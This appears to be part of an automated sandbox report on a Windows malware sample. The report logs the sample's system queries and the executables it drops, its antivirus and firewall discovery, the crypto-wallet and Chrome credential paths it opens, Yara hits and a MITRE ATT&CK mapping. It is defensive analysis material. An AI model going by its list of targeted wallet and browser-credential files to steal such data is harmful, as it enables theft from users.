Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Immunity\rutserv.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_0060C5F8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_0041C4F8 GetLocalTime,

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A7114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Electrum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \com.liberty.jaxx
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 1wOdXavtlE.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Source: Yara match

File source: 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 00000025.00000002.570035288.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.537867326.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scripting1	Registry Run Keys / Startup Folder1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	Input Capture1	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Logon Script (Windows)	Access Token Manipulation1	Scripting1	Security Account Manager	System Information Discovery177	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection112	Obfuscated Files or Information3	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Install Root Certificate1	LSA Secrets	Security Software Discovery561	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing22	Cached Domain Credentials	Process Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
